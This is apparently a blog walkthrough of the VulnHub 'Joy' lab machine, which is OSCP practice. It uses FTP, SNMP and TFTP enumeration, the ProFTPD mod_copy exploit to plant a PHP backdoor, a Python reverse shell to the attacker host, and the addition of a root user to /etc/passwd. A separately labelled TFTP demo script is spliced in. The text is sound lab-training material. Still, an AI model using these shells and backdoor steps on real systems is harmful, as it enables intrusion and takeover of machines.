DIGITALWORLD.LOCAL JOY Walkthrough — VulnHub- No Handshakes for Old Protocol— OSCP Practice

Nova
8 min readFeb 9, 2021

Joy is an OSCP-like machine from the DIGITALWORLD.LOCAL series with some important lessons to teach. We will dig into enumeration and network protocols and see how to take advantage of information that is not on the surface but is still available to us.

Joy might look hard at first, but as soon as we keep scanning and digging deeper it pours out plenty of joyful information to learn from and use to solve it.

Preparation

  1. Download Joy from VulnHub and boot it up in VMware or VirtualBox
  2. Your favorite haxor env; in this article I am using a Kali VM
  3. Find the IP address of Joy; one way to do it is a ping sweep with nmap
nmap -sn 192.168.1.0/24

In this case the target's IP is 192.168.1.183 (my Kali box is 192.168.1.105).

Tools

  • nmap
  • nc
  • python
  • ftp
  • OpenSSL

Topics

  • då 21 (FTP)
  • Continue manual walk-arounds when tools won’t return results!
  • UDP scan
  • SNMP
  • Understanding an FTP exploit in Python
  • /etc/passwd injection

Enumeration

Starting with good ol’ nmap scan!

sudo nmap -sC -sV -T4 -v -O 192.168.1.183 -oN nmap

Result (snipped)

Nmap scan report for JOY.wlan (192.168.1.183)
Host is up (0.00084s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
|_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Issuer: commonName=JOY
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-12-23T14:29:24
| Not valid after: 2028-12-20T14:29:24
| MD5: 9a80 5234 0ef3 1fdd 8f77 16fe 09ee 5b7b
|_SHA-1: 4f02 9a1c 1f41 2ec9 c0df 4523 b1f4 a480 25f9 0165
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL STLS AUTH-RESP-CODE CAPA RESP-CODES PIPELINING UIDL TOP
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE LITERAL+ SASL-IR Pre-login ENABLE capabilities IMAP4rev1 more have ID LOGINDISABLEDA0001 OK listed STARTTLS LOGIN-REFERRALS post-login
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
...
|_SHA-1: 4f02 9a1c 1f41 2ec9 c0df 4523 b1f4 a480 25f9 0165
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. ...
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:E5:37:DD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.046 days (since Sun Feb 7 19:52:34 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
...
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-07T18:58:17
|_ start_date: N/A

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 7 20:58:47 2021 -- 1 IP address (1 host up) scanned in 45.63 seconds
  • Right off the bat we have port 21 (ProFTPD) with anonymous login allowed
  • Port 80 serves a directory listing with an ossec web application; googling returns no working exploit for this version

21, it’s ‘b0ut då FTP Stuff

Let’s mount the FTP share, because why not!

curlftpfs 192.168.1.183 ftpdir/ -ouser=anonymous

Next in line is to cat them all!

find . -type f -not -empty -exec cat {} \;

There is a lot of gibberish, but the file under the upload directory is a listing of patrick’s home folder, which is trying to hide something in plain sight among all those hash-like file names!

Some names are red flags in this situation, version_control in particular, but the question is how we can get access to it?!

At this point it feels like a dead end, but if we go back to the start and check our nmap scan, we did not really scan the whole range of ports!

There are 65535 ports for each of TCP and UDP, and nmap’s default scan only covers its top 1000 TCP ports; there might be something hidden outside that range!

Scanning all TCP ports with the -p- option did not get us anything interesting, but a scan of UDP ports did!

First, to keep the process fast, I started with the top 20 UDP ports

sudo nmap -Pn -sU -A --top-ports=20 -v -oN udp.nmap 192.168.1.183

The results were massive; the most interesting part was an open SNMP service.

The SNMP service on udp/161 answers the default community string public (which nmap’s snmp scripts try), and its process table (the HOST-RESOURCES-MIB hrSWRunTable that the snmp-processes script walks) leaks a great deal of information about running services, in this case a TFTP daemon listening on udp/36969 and serving patrick’s home directory.

The ProFTPD we already connected to on tcp/21 is visible in that process list too.

That’s a recipe for disaster, and we like it!

Let’s test it with nc and then connect to it. Keep in mind that nc reports a UDP "connection" whether or not anything is listening (no handshake), so the real test is whether a fetch succeeds. TFTP has no directory listing at all (the protocol only has read and write requests), but since we know it exposes /home/patrick we take the leap and download version_control, the most interesting name in the listing!

nc -vu 192.168.1.183 36969
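The fetch itself, as an added example that is not part of the original post: with the stock client it is `tftp 192.168.1.183 36969` followed by `get version_control`. The Python below does the same read request by hand (RFC 1350 RRQ/DATA/ACK) against a throwaway local server so the exchange can be run offline. The served file content, the server and the names are constructed for the demo; only the protocol is the real thing.

```python
import os
import socket
import struct
import tempfile
import threading

# TFTP opcodes (RFC 1350).  There is no "list directory" opcode: a client can only
# read or write a name it already knows, which is why the leaked listing matters.
RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5
BLOCK = 512

# Constructed stand-in for the leaked file; it is not the real version_control from the box.
SAMPLE = b"Constructed sample: ProFTPD 1.3.5 listens on port 21\n" * 20


def tftp_get(host, port, filename, timeout=3.0):
    """Read `filename` from a TFTP server in octet mode and return its bytes.

    Handles the transfer-ID change (the server replies from a fresh port),
    duplicate DATA blocks (re-acknowledged, not re-appended) and ERROR packets.
    Lost packets surface as socket.timeout; a production client would retransmit.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(struct.pack("!H", RRQ) + filename.encode() + b"\0octet\0", (host, port))
    received = bytearray()
    expected = 1
    peer = None
    try:
        while True:
            pkt, addr = sock.recvfrom(4 + BLOCK)
            if peer is None:
                peer = addr  # first reply fixes the server's transfer ID
            elif addr != peer:
                continue  # stray datagram from somewhere else
            opcode = struct.unpack("!H", pkt[:2])[0]
            if opcode == ERROR:
                code = struct.unpack("!H", pkt[2:4])[0]
                message = pkt[4:].split(b"\0")[0].decode(errors="replace")
                raise OSError(f"tftp error {code}: {message}")
            if opcode != DATA:
                continue
            block = struct.unpack("!H", pkt[2:4])[0]
            if block == expected:
                received += pkt[4:]
                expected += 1
            sock.sendto(struct.pack("!HH", ACK, block), peer)  # ack (or re-ack) the block
            if block == expected - 1 and len(pkt) - 4 < BLOCK:
                return bytes(received)  # a short block terminates the transfer
    finally:
        sock.close()


def serve_one_file(root, ready, port_out):
    """Tiny read-only TFTP server used only to demo the exchange locally.

    Mirrors real servers: the RRQ arrives on the listening port, the transfer
    continues from a new socket (new transfer ID), unknown names get ERROR 1.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.bind(("127.0.0.1", 0))
    port_out.append(listener.getsockname()[1])
    ready.set()
    request, client = listener.recvfrom(4 + BLOCK)
    listener.close()
    opcode = struct.unpack("!H", request[:2])[0]
    name = request[2:].split(b"\0")[0].decode(errors="replace")
    path = os.path.join(root, os.path.basename(name))  # no traversal in the demo
    xfer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    xfer.bind(("127.0.0.1", 0))
    xfer.settimeout(3.0)
    try:
        if opcode != RRQ or not os.path.isfile(path):
            xfer.sendto(struct.pack("!HH", ERROR, 1) + b"File not found\0", client)
            return
        with open(path, "rb") as fh:
            content = fh.read()
        block = 1
        while True:
            chunk = content[(block - 1) * BLOCK:block * BLOCK]
            xfer.sendto(struct.pack("!HH", DATA, block) + chunk, client)
            ack, _ = xfer.recvfrom(4)
            if struct.unpack("!HH", ack) != (ACK, block):
                return  # keep the demo simple: no retransmission
            if len(chunk) < BLOCK:
                return  # last (short or empty) block acknowledged
            block += 1
    finally:
        xfer.close()


def demo(filename, content=SAMPLE, request=None):
    """Serve `content` as `filename` from a temp dir and fetch `request` (default: the same name)."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, filename), "wb") as fh:
            fh.write(content)
        ready, port_out = threading.Event(), []
        server = threading.Thread(target=serve_one_file, args=(root, ready, port_out), daemon=True)
        server.start()
        ready.wait(3.0)
        try:
            return tftp_get("127.0.0.1", port_out[0], request or filename)
        finally:
            server.join(3.0)


if __name__ == "__main__":
    print(demo("version_control").decode()[:53])
```

A file whose size is an exact multiple of 512 ends with an empty DATA block, which the client above treats like any other short block; asking for a name the server does not have comes back as an ERROR packet rather than silence, which is the only "listing" feedback TFTP ever gives you.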

From it we learn the versions of all those packages, including the ProFTPD running on our favorite port 21!

A quick google brings up CVE-2015-3306, remote command execution through the mod_copy module in ProFTPD 1.3.5: its SITE CPFR and SITE CPTO commands are accepted without authentication. This is huge, we can copy files around on the server remotely.

There is a python exploit for it

https://github.com/t0kx/exploit-CVE-2015-3306

The exploit needs us to provide the web root; from version_control we know it was changed to

/var/www/tryingharderisjoy

By looking closer at the exploit we can see how it works

https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py#L23
  • on line 23 it builds the PHP payload, which echoes the result of passthru on the cmd parameter
  • on line 24 it sends SITE CPFR /proc/self/cmdline; ProFTPD rewrites its process title with the command it is currently handling, so that pseudo-file will contain whatever the next SITE CPTO line says, payload included
  • on line 26 it sends SITE CPTO /tmp/.<payload>, so the staged copy in /tmp now has the PHP payload in its content
  • on lines 28 and 30 it uses CPFR and CPTO again to copy that staged file into the web root as backdoor.php, reachable at /backdoor.php
  • you can see an example of its usage on line 40 with /backdoor.php?cmd=whoami

The script just automates this mod_copy dance with sock.send; we could do the same by hand over a raw FTP control connection.

Let’s run the exploit and get a shell.

python3 exploit.py --host 192.168.1.183 --port 21 --path "/var/www/tryingharderisjoy"

and a test

Trying different shells from highon.coffee

The python one is working

http://192.168.1.183/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.105%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

Our user is www-data; we need to move to patrick or straight to root.

Enumeration scripts like Linux Smart Enumeration didn’t reveal anything interesting, so it feels like a dead end again, but after a deep breath, moving around the file system, especially the directory we dropped into, /var/www/tryingharderisjoy, a plain ls gives us what we need.

Patrick’s creds are literally right in front of our face.

Also check out local.txt there to learn a lesson!

With patrick’s account, let’s enumerate again

bash <(wget -q -O - https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh) -l2 -i

And yes, sudo -l reveals a script called test that patrick may run with sudo without a password.

Running it shows it is a bash script that changes the permissions of a file in its folder, but the file name is taken as-is, so we can point it at any path on the filesystem. We cannot edit the script itself, so the fastest route is to make /etc/passwd writable and add a new UID 0 user.

  • Use OpenSSL to create a salted MD5-crypt password hash
  • Form the passwd line (seven colon-separated fields: name, hash, UID, GID, GECOS, home, shell)
  • Append it to /etc/passwd and switch to the new user (password t00r)
openssl passwd -1 -salt somesalt t00r
echo 'nova:$1$somesalt$zl7ghhyb/ddzu8Jlo.q4b1:0:0::/root:/bin/bash' >> /etc/passwd
su nova

We got root, but this is not the only way to root this machine; on the hackingarticles.in blog you can read about a route that reuses the buggy ProFTPD cpfr and cpto.

There, the test script is overwritten with a new script containing a shell: upload it over FTP to the writable upload directory, then use telnet on port 21 to issue SITE CPFR and SITE CPTO (mod_copy) and copy it over the script, then run it with sudo.

Technically it is the more interesting way but not the fastest, BUT a NOPASSWD sudo script will not always be able to change the permissions of arbitrary files, so lesson learned!

Post Exploitation

Walking around the file system reveals some funny stuff; make sure to check out the folders you could not access with patrick’s account now that you have root :)

Conclusion

I learned a lot about how important it is to

  • Go back and enumerate again when it feels like a dead end
  • Look around and check things out manually when it feels like a dead end
  • Reuse exploits beyond their initial purpose (the foothold); they might become useful later for privilege escalation too!

I hope you enjoyed reading this!


Nova

Breaking stuff to learn them, learning stuff to break them!